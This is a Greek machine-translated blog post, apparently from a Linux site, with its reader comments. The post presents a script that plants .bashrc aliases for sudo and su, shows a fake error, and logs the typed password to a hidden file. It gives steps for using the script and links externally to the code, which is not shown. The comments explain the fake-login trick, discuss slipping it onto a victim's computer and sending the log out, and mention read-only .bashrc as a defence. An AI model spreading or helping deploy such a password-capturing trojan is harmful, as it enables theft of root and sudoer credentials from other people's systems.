Λάβετε τον κωδικό πρόσβασης ROOT

Έχω συναντήσει ένα σενάριο που αλλάζει το .bashrc δημιουργώντας ένα ψευδώνυμο για "sudo" και "su". όχι πριν, χωρίς να δημιουργήσετε αντίγραφο ασφαλείας του αρχείου για να το επαναφέρετε αργότερα.

Αυτό που κάνει είναι ότι στέλνει ένα μήνυμα σφάλματος όταν χρησιμοποιεί το "sudo" ή "su" και καταγράφει τον κωδικό πρόσβασης σε ένα αρχείο καταγραφής που ονομάζεται ".plog" που βρίσκεται στο σπίτι.

Τρόπος χρήσης

  1. Αποθηκεύστε το σενάριο
  2. Δώστε του δικαιώματα εκτέλεσης.
  3. Εκτελέστε το στο τερματικό
  4. Κλείστε το τερματικό
  5. Περίμενε.
  6. Στη συνέχεια, ελέγξτε το αρχείο .plog. Και πρέπει να υπάρχει ο κωδικός πρόσβασης της ρίζας ή κάποιου χρήστη που βρίσκεται στο sudoers.

http://paste.desdelinux.net/4691

ΑΠΟΛΑΜΒΑΝΩ.


Αφήστε το σχόλιό σας

Η διεύθυνση email σας δεν θα δημοσιευθεί. Τα υποχρεωτικά πεδία σημειώνονται με *

*

*

  1. Υπεύθυνος για τα δεδομένα: Miguel Ángel Gatón
  2. Σκοπός των δεδομένων: Έλεγχος SPAM, διαχείριση σχολίων.
  3. Νομιμοποίηση: Η συγκατάθεσή σας
  4. Κοινοποίηση των δεδομένων: Τα δεδομένα δεν θα κοινοποιούνται σε τρίτους, εκτός από νομική υποχρέωση.
  5. Αποθήκευση δεδομένων: Βάση δεδομένων που φιλοξενείται από τα δίκτυα Occentus (ΕΕ)
  6. Δικαιώματα: Ανά πάσα στιγμή μπορείτε να περιορίσετε, να ανακτήσετε και να διαγράψετε τις πληροφορίες σας.

  1.   V3on dijo

    γι 'αυτά τα παιδιά, είναι ότι η φυσική ασφάλεια της ομάδας μας δεν πρέπει να παραμεληθεί

    1.    truko22 dijo

      Αυτό είναι σωστό, εάν ο υπολογιστής δανείζεται για λίγο πρέπει να ελέγξετε τα ψευδώνυμα 😀

  2.   Lolo dijo

    Αθώα ερώτηση:

    Πώς αλλάζει το σενάριο το .bashrc ενός χρήστη που δεν είναι αυτο-sudoer;

  3.   Μπλερ Πασάλ dijo

    Ω, μου αρέσει πολύ. Δοκιμές.

  4.   πακοελόγιο dijo

    Άρα η ασφάλεια και η κρυπτογράφηση που χρησιμοποιούμε στο gnu / linux είναι άχρηστα; Νομίζω ότι αυτό δεν ισχύει, όποιος το δοκιμάσει θα πρέπει να σχολιάσει τα αποτελέσματα. Από τη χρήση αυτού του συστήματος έχω διαβάσει ότι τα επίπεδα κρυπτογράφησης στο Linux είναι πολύ υψηλά. Οι κωδικοί πρόσβασης κρυπτογραφούνται χρησιμοποιώντας αλγόριθμους μίας κατεύθυνσης κρυπτογραφικής μείωσης και τώρα αποδεικνύεται ότι με ένα απλό σενάριο παραλείπεται η κρυπτογράφηση. Λυπάμαι αλλά δεν το πιστεύω.

    1.    @Jlcmux dijo

      Εάν λειτουργεί, κοίτα. Αυτό που συμβαίνει είναι ότι το σενάριο δημιουργεί ένα ψευδώνυμο στο .bashrc με sudo και su. Και όταν πληκτρολογείτε su και / ή sudo. Διαβάζει πρώτα το ψευδώνυμο. όχι η ίδια η εντολή. οπότε όταν γράφετε τον κωδικό πρόσβασης το βάζει σε ένα κανονικό αρχείο κειμένου. και στη συνέχεια διαγράφει το ψευδώνυμο και σας επιτρέπει να χρησιμοποιήσετε το sudo ή το κοινό και το τρέχον. Εννοώ, είναι σαν ένα pishing. Δεν είναι ότι παρακάμπτει την κρυπτογράφηση. είναι μια ψεύτικη σύνδεση.

      1.    πακοελόγιο dijo

        Εντάξει τώρα, αν καταλαβαίνω, ήμουν ήδη έκπληκτος που παρακάμψαμε αυτήν την προστασία στο torrera .. Ευχαριστώ που το διευκρινίσατε.

        1.    Κέικε dijo

          Σίγουρα, αλλά το πιο δύσκολο πράγμα παραμένει, για να πάρετε το σενάριο να γλιστρήσει στον υπολογιστή του θύματος, να το εκτελέσετε και στη συνέχεια να συλλέξετε το αρχείο από απόσταση ή να το στείλετε σε ένα email Εκεί ο καθένας θα πρέπει να χρησιμοποιήσει τη φαντασία τους!

    2.    πάντα dijo

      Νομίζω ότι υπερβάλλατε πολύ pacoeloyo. Αυτό είναι ένα απλό Trojan, το οποίο απαιτεί από έναν χρήστη να παρακάμψει διάφορα μέτρα ασφαλείας και τοπική παρουσία του εισβολέα. Αυτό υπάρχει σε οποιοδήποτε λειτουργικό σύστημα.
      Όσον αφορά το σενάριο ... εάν δεν κάνω λάθος, τα περισσότερα τρέχοντα SUDO επικυρώνουν τον κωδικό πρόσβασης του χρήστη και όχι τον ριζικό κωδικό πρόσβασης. Έτσι, ο κωδικός πρόσβασης που θα ληφθεί είναι αυτός του χρήστη (υπάρχει στα sudoers).
      αφορά

      1.    @Jlcmux dijo

        είναι με sudo ή su. Επίσης, εάν ένας χρήστης μπορεί να χρησιμοποιήσει το sudo, είναι επειδή βρίσκεται σε sudoers και έχει τα ίδια προνόμια με το root .. ή όχι;

        1.    πάντα dijo

          όχι πάντα, εξαρτάται από τη διαμόρφωση sudoers. Τέλος πάντων, το πιο συνηθισμένο είναι ότι ναι, έχετε πλήρη πρόσβαση.
          Το θέμα είναι ότι οι ενέργειες που εκτελούνται χρησιμοποιώντας sudo συνήθως καταγράφονται

      2.    διαζεπάνη dijo

        απλώς επικαλούμενος "su" σάς δίνει πρόσβαση στον ριζικό λογαριασμό.

  5.   ps dijo

    Αυτό είναι πολύ επικίνδυνο εάν χρησιμοποιείτε καλούς κωδικούς πρόσβασης σε κοινόχρηστα περιβάλλοντα τάξης ή εργαστηρίου. Μπορούν να το παίξουν για εσάς. Λοιπόν, θα μπορούσαν να το παίξουν ...

    Δεν είναι χρήσιμο να ανακαλύψεις τους κωδικούς πρόσβασης ενός ξένου, αλλά νομίζω ότι αρκεί ένας γνωστός.

    Και θυμηθείτε, οι περισσότεροι αντιγράφουν τους κωδικούς πρόσβασης ή χρησιμοποιούν κοινά μοτίβα. Ποτέ μην τους υποτιμάτε. Εάν είστε πολύ μπάσταρδοι φυσικά ...

  6.   Ζερμέν dijo

    Λοιπόν, δεν κάνω χάος ... Δεν έχω τίποτα να κρύψω, ούτε καν τις τελικές ερωτήσεις των εξετάσεων ... και αν χρειάζομαι κωδικό πρόσβασης, το ρωτάω ... και έχω τα αρχεία μου σε εξωτερικό σκληρό δίσκο .. με αντίγραφο ασφαλείας στον φορητό υπολογιστή μου που παραμένει House.
    Πρέπει να αναζητήσουμε απλότητα και πρακτικότητα, σήμερα είμαι ζωντανός, αύριο δεν ξέρω ... Ζω σήμερα τα υπόλοιπα είναι υπερωρίες.

  7.   φερμεταλλικό dijo

    Θα το θυμάμαι, ευχαριστώ.

  8.   Έλινξ dijo

    Ενδιαφέρων!

  9.   Lolo dijo

    Πώς αντιγράφεται αυτό το σενάριο στο .bashrc του χρήστη sudoer;

    Εάν έχετε λογαριασμό στον υπολογιστή, δεν μπορείτε να εισέλθετε στο σπίτι ενός άλλου χρήστη, εκτός εάν έχετε άδεια και εξακολουθώ να αμφιβάλλω ότι μπορείτε να τροποποιήσετε το .bashrc του θύματος.

    Αμφιβάλλω πολύ ότι θα λειτουργήσει εκτός εάν ο χρήστης sudoer είναι εξαιρετικά απρόσεκτος.

  10.   Λέξ Αλεξάντρ dijo

    Πρέπει να είμαστε πολύ προσεκτικοί με αυτόν τον καιρό!

  11.   Μάρκος dijo

    Μια ερώτηση, εάν δεν έχω τον κωδικό πρόσβασης ρίζας, πώς μπορώ να δώσω άδεια εκτέλεσης του αρχείου; Ή ένας κανονικός χρήστης λειτουργεί;

    1.    @Jlcmux dijo

      Σαφή. Τα δικαιώματα εκτέλεσης δεν είναι αποκλειστικά για root.

      1.    Αλμπέρτο ​​Άρου dijo

        ΒΟΗΘΕΙΑ!
        αφού το δοκίμασα, έχω διαγράψει το .sudo_sd και δεν μπορώ να βρω τίποτα στο google (ή σε άλλες μηχανές αναζήτησης)

        1.    Αλμπέρτο ​​Άρου dijo

          Διαγράψαμε το .plog και διαγράφηκε αυτόματα .sudo_sd και δεν μπορώ να συνδεθώ ως root

          1.    Αλμπέρτο ​​Άρου dijo

            ΔΙΟΡΘΩΣΕΤΑΙ ΜΕ ΠΑΡΑΤΗΡΗΣΕΙΣ ΣΕ ΑΛΥΣΙΔΕΣ

  12.   Κάρτα dijo

    Εάν αυτό λειτουργεί σε MAC, θα πάω να ψάξω ένα κατάστημα της Apple… hey! αλλά λίγο, όχι σε τρομοκρατικό σχέδιο 😉

  13.   Άθιος dijo

    Ενδιαφέρουσα είσοδος

    Αμφιβολία

    Και αν χρησιμοποιώ το gksu ή το αντίστοιχο στο kde

    Καταγράφει επίσης τον κωδικό πρόσβασης

    αφορά

  14.   ζωή κράνος dijo

    Η εκτέλεση αυτού του σεναρίου μπορεί να αποφευχθεί δίνοντας άδεια μόνο για ανάγνωση στο .bashrc

  15.   Μπλαζέκ dijo

    Δοκιμασμένο, λειτουργεί, το aunk έχει τους περιορισμούς του. Μαθαίνετε πάντα νέα πράγματα στο Linux.

  16.   Αλμπέρτο ​​Άρου dijo

    Πώς μπορώ να επαναφέρω τις αλλαγές μόλις γίνουν; Έχω διαγράψει το .plog και δεν θα με αφήσει να χρησιμοποιήσω το sudo:
    bash: /home/alberto/.sudo_sd: Το αρχείο ή ο κατάλογος δεν υπάρχει

    1.    Αλμπέρτο ​​Άρου dijo

      ΔΙΟΡΘΩΣΕΤΑΙ ΜΕ ΠΑΡΑΤΗΡΗΣΕΙΣ ΣΕ ΑΛΥΣΙΔΕΣ